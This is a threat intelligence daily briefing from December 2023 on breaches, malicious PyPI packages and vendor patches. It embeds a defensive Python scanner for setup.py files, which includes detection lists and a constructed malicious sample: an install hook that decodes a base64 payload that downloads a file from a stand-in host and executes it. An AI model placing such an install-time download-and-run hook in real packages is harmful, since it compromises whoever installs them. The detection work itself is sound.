
Cyware Daily Threat Intelligence


Daily Threat Briefing Dec 13, 2023

The open-source security landscape faces a significant threat: around 1,450 exposed pfSense instances were found at risk from command injection and cross-site scripting vulnerabilities that can be combined for RCE and access to sensitive resources. Meanwhile, 116 malicious packages across 53 projects on PyPI, downloaded over 10,000 times since May 2023, were found delivering a backdoor capable of remote command execution, data exfiltration, and taking screenshots on both Windows and Linux systems.

In a different story, Sophos warned that a critical severity flaw in end-of-life versions of its Firewall product is under active exploitation. Other firms that addressed severe vulnerabilities across their products on this last Patch Tuesday of the year include SAP, Google, Atlassian, Microsoft, and more.

Top Breaches Reported in the Last 24 Hours

Russia's Tax service infrastructure impacted

Ukraine's defense intelligence (GUR) claimed it crippled over 2,300 servers of Russia's state tax service (FNS). GUR allegedly breached a central FNS server, destroying databases and backups, causing "complete destruction" of the agency's infrastructure. The attack reportedly paralyzed FNS's internet connection for a month, with recovery deemed unlikely.

Attack on Ukraine’s top telecom firm

A cyberattack on Kyivstar, Ukraine's largest telecom operator, disrupted internet and mobile services. Kyivstar’s parent company is investigating the attack's impact. The outage affected air raid sirens, retail payments, and ATMs. The self-proclaimed Russian hacktivist group KillNet claimed responsibility for the attack.

Database laid bare nearly a million donors’ records

DonorView, a cloud-based fundraising platform used by non-profits, exposed almost a million records containing donors' PII in an unprotected database. The exposed data includes donor names, addresses, phone numbers, emails, payment methods, and more. Infosec researcher Jeremiah Fowler discovered the exposed database and found records that appeared to include information about children associated with the donations.

Dubai’s transportation service breached

Dubai Taxi Company (DTC), a major transportation service in Dubai, suffered a significant data breach, exposing over 197,000 app users and 23,000 drivers. The leaked data, stored in an open MongoDB database, included customer information, logs, drivers' details, bank information, and passenger order details. The breach, covering data from 2018 to 2021, potentially compromised email addresses, phone numbers, tokens, and driver specifics such as driving license numbers and encrypted passwords.

Top Malware Reported in the Last 24 Hours

Malicious PyPI packages target both Windows and Linux

ESET Research uncovered a cluster of malicious PyPI packages distributing a custom backdoor and, in some cases, the notorious W4SP Stealer or a clipboard monitor that swaps cryptocurrency wallet addresses. Both Windows and Linux systems are affected. The researchers identified 116 malicious packages within 53 projects on PyPI, with over 10,000 downloads by victims. Techniques employed by the attackers include embedding malicious code in the setup.py file, so that it runs at install time, and using lightly obfuscated code to evade casual review.
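Because setup.py executes with the installing user's privileges whenever a source distribution is built, a pre-install review of that file is a cheap check. The following script is an added example (not ESET's tooling, and not anything from the PyPI packages described above) that statically flags the install-time patterns the report mentions: code executed from decoded strings, network or process-spawning modules imported in setup.py, long base64 literals, and a custom `cmdclass` hook on the install command. The two sample setup.py files are constructed for the example; the package names, URL, and the `scan_setup_py` function are illustrative, not real identifiers.

```python
"""Static triage of a setup.py for install-time execution tricks.

Added illustration; the sample files are constructed, not real PyPI packages.
Walks the AST rather than executing the file, so nothing in setup.py runs.
"""
import ast
import base64
import re

# Modules that a normal setup.py has no reason to import at build time.
SUSPICIOUS_MODULES = {"base64", "urllib", "urllib.request", "requests",
                      "subprocess", "socket", "ctypes", "zlib", "marshal"}
# Built-ins that turn data into running code.
CODE_SINKS = {"exec", "eval", "compile", "__import__"}
# Calls that reach the network or spawn processes.
DANGEROUS_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
                   "os.system", "os.popen", "urllib.request.urlopen",
                   "urllib.request.urlretrieve", "requests.get"}
# A base64 blob of 80+ characters is rarely legitimate in packaging metadata.
BASE64_RE = re.compile(r"^[A-Za-z0-9+/=]{80,}$")


def _call_name(node):
    """Return the dotted callee name of a Call node ('' if not a plain name)."""
    func = node.func
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return ""


def scan_setup_py(source):
    """Return a sorted list of finding tags for the given setup.py source."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in SUSPICIOUS_MODULES:
                    findings.add(f"import:{alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if node.module in SUSPICIOUS_MODULES:
                findings.add(f"import:{node.module}")
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in CODE_SINKS:
                findings.add(f"code-sink:{name}")
            elif name in DANGEROUS_CALLS:
                findings.add(f"call:{name}")
            elif name == "setup" and any(k.arg == "cmdclass" for k in node.keywords):
                # Overriding 'install'/'develop' runs arbitrary code on pip install.
                findings.add("cmdclass-override")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if BASE64_RE.match(node.value):
                findings.add("long-base64-literal")
    return sorted(findings)


# Constructed sample: an ordinary setup.py.
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="goodpkg", version="1.0", packages=find_packages())
'''

# Constructed sample: install hook that decodes and exec()s a hidden stage.
# The "payload" only fetches a file from a non-routable example host.
_PAYLOAD = base64.b64encode(
    b"import os, urllib.request\n"
    b"urllib.request.urlretrieve('http://example.invalid/p', '/tmp/p')\n"
    b"os.system('chmod +x /tmp/p && /tmp/p')\n"
).decode()
MALICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import base64, os

class PostInstall(install):
    def run(self):
        install.run(self)
        exec(base64.b64decode("__PAYLOAD__"))

setup(name="evilpkg", version="0.1", cmdclass={"install": PostInstall})
'''.replace("__PAYLOAD__", _PAYLOAD)


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("malicious", MALICIOUS_SETUP)):
        print(label, scan_setup_py(src) or "clean")
```

The check runs offline on the sdist's setup.py before `pip install` ever evaluates it (`pip download --no-binary :all: <pkg>` fetches the archive without building it). It is a triage heuristic, not a verdict: string splitting, attribute access via `getattr`, or a payload hidden in a module imported by setup.py will slip past an AST walk, so treat a clean result as "nothing obvious" rather than "safe".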

Top Vulnerabilities Reported in the Last 24 Hours

Microsoft patches 33 flaws

Microsoft's last Patch Tuesday for 2023 addressed 33 vulnerabilities, with four rated ‘Critical’ and 29 ‘Important.’ The fixes covered Windows components such as Internet Connection Sharing as well as products including Microsoft Outlook. One notable flaw (CVE-2023-36019) in Power Platform Connector could allow attackers to execute malicious scripts in victims' browsers. Additionally, three DHCP Server service vulnerabilities were patched, addressing denial-of-service and information disclosure issues.

pfSense bugs expose 1,450 instances to RCE

Around 1,450 exposed pfSense instances are vulnerable to command injection and cross-site scripting (XSS) flaws, according to SonarSource researchers. The flaws affect pfSense CE 2.7.0 and older and pfSense Plus 23.05.01 and older. The reflected XSS flaws require user interaction, while the command injection flaw (CVE-2023-42326) lets an attacker execute commands as root but requires an account with permission to edit interfaces; tricking a privileged user into triggering an XSS is one way to reach that foothold, which is why the bugs are dangerous in combination. Administrators should update and avoid exposing the web interface to the internet.

Sophos addressed flaws in EoL versions

Sophos issued patches for a critical vulnerability (CVE-2022-3236) under exploitation in Sophos Firewall versions 19.0 MR1 (19.0.1) and older. Although the flaw was first patched in September 2022, it was exploited in the wild again, prompting Sophos to extend the fix to end-of-life firmware in December 2023. The code injection vulnerability allows RCE and affects the Firewall’s User Portal and Webadmin components. Organizations that updated to supported versions after September 2022 are protected; appliances still running EOL firmware remain vulnerable until the updated fix is applied.

Multiple RCE flaws in Atlassian products

Atlassian, whose collaboration products are widely used, faces a critical threat from multiple vulnerabilities that enable remote code execution. The issues are tracked as CVE-2023-22522, CVE-2023-22523, CVE-2023-22524, and CVE-2022-1471. Products including Confluence, Jira, and Bitbucket are impacted, potentially allowing attackers to gain unauthorized access, manipulate data, or create privileged accounts. The risk extends to government and business entities, with the impact varying based on the privileges of the exploited user.

SAP’s Patch Day updates out

SAP released 15 new and two updated security notes as part of its December 2023 Security Patch Day. Among them are four hot news notes addressing vulnerabilities in the SAP Business Technology Platform (BTP) and in the Chromium-based browser embedded in SAP Business Client. One hot news note fixes a critical severity elevation of privilege flaw in BTP; customers are urged to review and apply the update. SAP also released high-priority security notes addressing issues in Commerce Cloud, BusinessObjects, SAP GUI, and the EMARSYS SDK for Android.

Google Chrome fixes high severity flaws

Google released an update for its Chrome browser addressing several vulnerabilities, including five high-severity flaws. The most severe of the fixed issues is a type confusion bug in the V8 JavaScript engine (CVE-2023-6702). The other high-severity flaws are use-after-free bugs in various components that could lead to arbitrary code execution, data corruption, or denial of service.
